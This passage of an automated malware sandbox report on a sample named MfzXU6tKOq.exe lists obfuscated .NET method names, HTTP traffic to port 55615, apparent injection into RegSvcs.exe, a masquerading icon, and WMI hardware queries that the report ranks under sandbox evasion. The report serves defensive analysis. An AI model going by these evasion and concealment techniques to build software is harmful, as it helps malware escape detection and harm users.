                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, QqyO6pHTt1UWliFFCt.csHigh entropy of concatenated method names: 'E8AIe9qvJO', 'y46Ii8VUso', 'CjEIpuFfEt', 'ikcI0gEbwy', 'cKvIADVYmh', 'W0GIUYXLh5', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, HWcSfa88RSLEHEIkFRQ.csHigh entropy of concatenated method names: 'kZGIHE60hq', 'UBgIzpLZjT', 'VFbF7pOXNW', 'LjSF8a14uZ', 'sy4Fk4o5AF', 'QLfFQF4WyB', 'x1PFRv4txL', 'l77FJk3yuN', 'cmCFml3yTZ', 'nBNF5FAvZp'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, ewD9ERWmsIhWGOjL34.csHigh entropy of concatenated method names: 'sBRpxEDOKt', 'tgfplZ0KsN', 'mBqpjBLlbf', 'ToString', 'uNLpyb5idV', 'aTep3aU2b9', 'Wsorrb1htLgWtSQGAPT', 'yGerLD1EJsVXEj09MEk', 'RVtpUR1CPBIZF3vSOeK'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, UMVKlQ87qGFSbTrdKIo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hIMInbP7Tl', 'hymIghxoMx', 'EmvIXjtU01', 'jy0IS9tTFC', 'RcsIYkdaKA', 'aAaIxLNy1D', 'LFDIlNk85j'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, JKOLjhkdUhoMuNimQy.csHigh entropy of concatenated method names: 'RLdGjXHob', 'VSHKD1JWA', 'CQXaF5Wkh', 'ibTvwF5eZ', 'iavMTaAEN', 'v1ibZBgdo', 'vlDrMlBNFjKdClm9Ud', 'suYafkkqVTiB3u4nkF', 'WDu1M1XqesvqoXeMGJ', 'zw0sFAd1Q'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, XqdHj08RBFq23fr1JuE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't20rAmYEyg', 'fGRrIAetQ1', 'cTgrFfl1y1', 'vDfrre4aet', 'lUZrwuHAws', 'Tm3rhZSEWV', 't9WrCiZapR'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, eoYyX8MZcp2W78fe3y.csHigh entropy of concatenated method names: 'wGCeK2LAuT', 'gKFea2kcV5', 'q5xeNfdBhU', 'cWeeMxqPdh', 'dvCe6MuYSX', 'da8eLFXva2', 'Skoe4VVvKW', 'BsuesbO8SS', 'z3MeAvlRyF', 'R6geIghlME'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, MnoQnNNBEfx1yMu4gx.csHigh entropy of concatenated method names: 'C4b5SJeNuM', 'LpA5Yulug2', 'fTq5xh6tlD', 'BsS5lfTUE3', 'F2v5jVDUcL', 'sAN5y53vZ7', 'Xec53mtSlv', 'T4P5BCuBj8', 'h5A5VsdMCl', 'NIw5H8jaHF'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, mBj6MbScOALfttq9w3.csHigh entropy of concatenated method names: 'SGP6qjmA0O', 'BXe6gekCvn', 'QQY6Sjivj4', 'nxK6YRU3bS', 'YwQ6o4aFDh', 'iiV6DiK8xB', 'aA66POZXat', 'Php62bdZtR', 'VRb6WaVsSk', 'mkH6TCgFG7'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, YvqQQi5LQSEtA1vIFA.csHigh entropy of concatenated method names: 'Dispose', 'XRN8VhAXPc', 'jPAkoC8kjS', 'adpW7sNyUE', 'AXm8HeJAlm', 'VDw8zA1AJO', 'ProcessDialogKey', 'qHyk7XqMOg', 'gSvk8URtcm', 'SGYkkSqyO6'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, FIxVroxvqejdE6OIaG.csHigh entropy of concatenated method names: 'ToString', 'TOnLnwdlrN', 'qsALobJTke', 'p4LLDPp4WS', 'ojJLP0ek5s', 'sa7L2C9Em5', 'vZSLWaORMe', 'f3eLTY4XQa', 'CIcLuqjA69', 'h6dLfCUmIq'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, SXBl9DUuhnByiBQ9xl.csHigh entropy of concatenated method names: 'ae8QJDev8s', 'vxcQmesOoG', 'qPlQ5Eylp2', 'zNoQetDyrT', 'lw7QiW5veM', 'qaWQpnrDuZ', 'G4uQ03qEpi', 'GdRQUavqWw', 'ddjQ1TJ7lO', 'RnuQcd35Dl'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, YWKcSAZiNp9h8FCBMb.csHigh entropy of concatenated method names: 'XLxpJno0Wq', 'mHep5jx1gx', 'IUWpiShlhM', 'KFkp0rT9vv', 'GsEpUbIO4p', 'YW4ijUxjfV', 'Fajiy2W4BG', 'skVi36R6dL', 'oMeiBwGIL8', 'q22iVwX6k6'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, UXqMOgV5SvURtcmxGY.csHigh entropy of concatenated method names: 'wU4AZgQwyJ', 'fYfAoSi5g3', 'PxOADIIJFC', 'peZAPob8k7', 'ffHA25lU9D', 'UXLAWm98nV', 'dW0ATsF9As', 'en6AuTAUQL', 'vvXAfZslXg', 'm7JAqKrygv'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, zsFXqfRIeoBPtVyXeV.csHigh entropy of concatenated method names: 'U6f80noQnN', 'XEf8Ux1yMu', 'bZc8cp2W78', 'Ne38EyequW', 'Vxy860tHWK', 'mSA8LiNp9h', 'QFgyXab11Mo7aFDE3e', 'U65xJUywKXPWqcqtGN', 'bYY88SaQkH', 'lI68QToIu7'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, a9NNWnz9bHnXJ9XOJE.csHigh entropy of concatenated method names: 'jdHIan241n', 'zDYIN1QjSd', 'JAjIMflQ6Q', 'bIZIZ1naMc', 'F15Iocs0OE', 'qUDIPQqhTS', 'nUHI27kYgZ', 'U99ICJgLiF', 'hBPI94YxwU', 'YkeIde1PLs'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, hquWfGbN9urpwyxy0t.csHigh entropy of concatenated method names: 'SNLitDm4wN', 'L56ivjSMc2', 'TLFeD0E1ij', 'LLkePRTDf0', 'DERe2cSOex', 'gV8eWfEdWI', 'b5DeTe0auG', 'nsleuUSA9W', 'DT4efLZy7U', 'DCweqQJdtQ'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, LauFip3XiVRNhAXPct.csHigh entropy of concatenated method names: 'EIYA6wqkr2', 'WSiA4gIpfO', 'HCVAAnZdo1', 'riGAFmZQ6U', 'UILAwldDaQ', 'RDPACM4WpZ', 'Dispose', 'uaCsmmoqn6', 'u98s5ov159', 'FiMsePQ2A6'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, ep76eoyyPk7bM5DK2l.csHigh entropy of concatenated method names: 'eT64BUWyGe', 'MPt4HupBNT', 'vgGs7DDOnr', 'yvTs8DYGIp', 'iUc4n4SbfV', 'QwH4gjK7st', 'MtL4XU8b5u', 'THB4So4MPX', 'd4a4YBx8bF', 'cxi4xkImLw'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, psvohwT95GnjjCxgtU.csHigh entropy of concatenated method names: 'qk00mdB5FI', 'UG80eORo7P', 'n4K0pfn23l', 'fhMpHI9nt1', 'anRpzBXWje', 'rSN073SqhG', 'pYU08HNfos', 'EMM0kr9arG', 'tbo0Q1TAmZ', 'XfT0REWDLN'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, cZuCu9XLKotE53aNYP.csHigh entropy of concatenated method names: 'h5nONWlhAc', 'lDMOMJD1sO', 'IRXOZWine3', 'J7NOoJb4Ki', 'K6FOP6HCYt', 'fKUO2s7oLp', 'zgwOTBLDSB', 'QyNOuy4aF0', 'DZ6OqykZfG', 'rx7OnWv3Ic'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, FLJvcTelaVsqNXHfyM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uplkVg9BGj', 'IeDkHvKOpB', 'r4SkzaBfBe', 'uCPQ7vuSq3', 'YYjQ8CogKN', 'zpvQkDvLvX', 'iupQQLhGGJ', 'p6iNCHPJBfBp9V89LBH'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, KPu0gLftgAq1NdILl0.csHigh entropy of concatenated method names: 'QGe09BhMNb', 'CHW0dl9KZ3', 'n3F0G0vACD', 'SY90KebOTR', 'rQc0tLritE', 'Cvj0aMxUXr', 'Upf0vuKH4M', 'HWV0NA9ngY', 'q4K0MOlvHJ', 'b5K0bILTXZ'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, suxMDplAaBQEMHhMt8.csHigh entropy of concatenated method names: 'YEl4cQckth', 'nPX4EJuJ1I', 'ToString', 'ber4m9aWk8', 'vfZ45CTaCV', 'Sqs4eWUybZ', 'ImJ4i3hHy1', 'Pgj4pQyILi', 'fwo40tB2Bf', 'd3h4UciS3t'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, QqyO6pHTt1UWliFFCt.csHigh entropy of concatenated method names: 'E8AIe9qvJO', 'y46Ii8VUso', 'CjEIpuFfEt', 'ikcI0gEbwy', 'cKvIADVYmh', 'W0GIUYXLh5', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, HWcSfa88RSLEHEIkFRQ.csHigh entropy of concatenated method names: 'kZGIHE60hq', 'UBgIzpLZjT', 'VFbF7pOXNW', 'LjSF8a14uZ', 'sy4Fk4o5AF', 'QLfFQF4WyB', 'x1PFRv4txL', 'l77FJk3yuN', 'cmCFml3yTZ', 'nBNF5FAvZp'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, ewD9ERWmsIhWGOjL34.csHigh entropy of concatenated method names: 'sBRpxEDOKt', 'tgfplZ0KsN', 'mBqpjBLlbf', 'ToString', 'uNLpyb5idV', 'aTep3aU2b9', 'Wsorrb1htLgWtSQGAPT', 'yGerLD1EJsVXEj09MEk', 'RVtpUR1CPBIZF3vSOeK'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, UMVKlQ87qGFSbTrdKIo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hIMInbP7Tl', 'hymIghxoMx', 'EmvIXjtU01', 'jy0IS9tTFC', 'RcsIYkdaKA', 'aAaIxLNy1D', 'LFDIlNk85j'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, JKOLjhkdUhoMuNimQy.csHigh entropy of concatenated method names: 'RLdGjXHob', 'VSHKD1JWA', 'CQXaF5Wkh', 'ibTvwF5eZ', 'iavMTaAEN', 'v1ibZBgdo', 'vlDrMlBNFjKdClm9Ud', 'suYafkkqVTiB3u4nkF', 'WDu1M1XqesvqoXeMGJ', 'zw0sFAd1Q'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, XqdHj08RBFq23fr1JuE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't20rAmYEyg', 'fGRrIAetQ1', 'cTgrFfl1y1', 'vDfrre4aet', 'lUZrwuHAws', 'Tm3rhZSEWV', 't9WrCiZapR'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, eoYyX8MZcp2W78fe3y.csHigh entropy of concatenated method names: 'wGCeK2LAuT', 'gKFea2kcV5', 'q5xeNfdBhU', 'cWeeMxqPdh', 'dvCe6MuYSX', 'da8eLFXva2', 'Skoe4VVvKW', 'BsuesbO8SS', 'z3MeAvlRyF', 'R6geIghlME'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, MnoQnNNBEfx1yMu4gx.csHigh entropy of concatenated method names: 'C4b5SJeNuM', 'LpA5Yulug2', 'fTq5xh6tlD', 'BsS5lfTUE3', 'F2v5jVDUcL', 'sAN5y53vZ7', 'Xec53mtSlv', 'T4P5BCuBj8', 'h5A5VsdMCl', 'NIw5H8jaHF'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, mBj6MbScOALfttq9w3.csHigh entropy of concatenated method names: 'SGP6qjmA0O', 'BXe6gekCvn', 'QQY6Sjivj4', 'nxK6YRU3bS', 'YwQ6o4aFDh', 'iiV6DiK8xB', 'aA66POZXat', 'Php62bdZtR', 'VRb6WaVsSk', 'mkH6TCgFG7'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (29).png
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 55615
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49744
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory allocated: 6B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory allocated: 21F0000 memory reserve | memory write watchJump to behavior
